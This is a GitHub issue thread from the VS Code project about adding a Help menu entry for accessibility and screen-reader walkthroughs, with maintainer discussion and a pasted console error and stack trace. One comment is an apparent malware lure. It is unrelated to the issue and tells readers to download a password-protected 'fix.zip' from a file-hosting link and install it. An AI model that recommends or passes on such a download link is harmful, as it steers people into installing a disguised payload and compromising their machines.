### ISSUE TITLE
Add help menu entry-point for accessibility walkthroughs

### ISSUE THREAD

**Issue by meganrogge** [microsoft/vscode#226646]
Screen reader and low vision (or other accessibility) users often use our menu items to discover things. 

@jooyoungseo suggested we should add `Get Started using a Screen Reader` to the `Help` menu. We should also add that for other accessibility users once [#226645](https://github.com/microsoft/vscode/issues/226645) has been accomplished.

**Comment by meganrogge** [comment]
@isidorn and @daviddossett, WDYT?

**Comment by daviddossett** [comment]
Seems reasonable to me. The title suggests that it could also be a walkthrough, or part of an existing walkthrough. The tradeoff there would be discoverability.

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bpasero** [comment]
I see an error in the console when opening accessible view from that welcome experience:

```
RR Unable to resolve resource accessible-view:accessible-view-walkthrough#Title%3A%20Get%20Started%20with%20Accessibility%20Features%0A%0ADescription%3A%20Learn%20the%20tools%20and%20shortcuts%20that%20make%20VS%20Code%20accessible.%20Note%20that%20some%20actions%20are%20not%20actionable%20from%20within%20the%20context%20of%20the%20walkthrough.%0A%0AStep%202%3A%20Screen%20reader%20users%20can%20inspect%20content%20line%20by%20line%2C%20character%20by%20character%20in%20the%20accessible%20view.%0ADescription%3A%20The%20accessible%20view%20is%20available%20for%20the%20terminal%2C%20hovers%2C%20notifications%2C%20comments%2C%20notebook%20output%2C%20chat%20responses%2C%20inline%20completions%2C%20and%20debug%20console%20output.%20%20With%20focus%20in%20any%20of%20those%20features%2C%20it%20can%20be%20opened%20with%20the%20Open%20Accessible%20View%20command.%20Open%20Accessible%20View: Error: Unable to resolve resource accessible-view:accessible-view-walkthrough#Title%3A%20Get%20Started%20with%20Accessibility%20Features%0A%0ADescription%3A%20Learn%20the%20tools%20and%20shortcuts%20that%20make%20VS%20Code%20accessible.%20Note%20that%20some%20actions%20are%20not%20actionable%20from%20within%20the%20context%20of%20the%20walkthrough.%0A%0AStep%202%3A%20Screen%20reader%20users%20can%20inspect%20content%20line%20by%20line%2C%20character%20by%20character%20in%20the%20accessible%20view.%0ADescription%3A%20The%20accessible%20view%20is%20available%20for%20the%20terminal%2C%20hovers%2C%20notifications%2C%20comments%2C%20notebook%20output%2C%20chat%20responses%2C%20inline%20completions%2C%20and%20debug%20console%20output.%20%20With%20focus%20in%20any%20of%20those%20features%2C%20it%20can%20be%20opened%20with%20the%20Open%20Accessible%20View%20command.%20Open%20Accessible%20View
    at j8e.r (vscode-file://vscode-app/Applications/Visual%20Studio%20Code%20-%20Insiders.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js:1277:21087)
    at j8e.r (vscode-file://vscode-app/Applications/Visual%20Studio%20Code%20-%20Insiders.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js:1277:21073)
    at async Gdi.acquire (vscode-file://vscode-app/Applications/Visual%20Studio%20Code%20-%20Insiders.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js:23:3125)
    at async _8e.createModelReference (vscode-file://vscode-app/Applications/Visual%20Studio%20Code%20-%20Insiders.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js:1277:22405)
    at async YMe.E (vscode-file://vscode-app/Applications/Visual%20Studio%20Code%20-%20Insiders.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js:477:19032)
```

**Comment by meganrogge** [comment]
Cc @bhavyaus

**Comment by bhavyaus** [comment]
Related: https://github.com/microsoft/vscode/issues/229545
